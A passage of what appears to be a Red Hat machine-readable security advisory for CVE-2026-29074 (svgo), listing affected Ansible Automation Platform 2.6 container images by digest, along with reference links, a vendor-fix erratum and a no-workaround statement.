"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "RHBZ#2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
"url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
}
],
"release_date": "2026-03-06T07:23:05.716000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
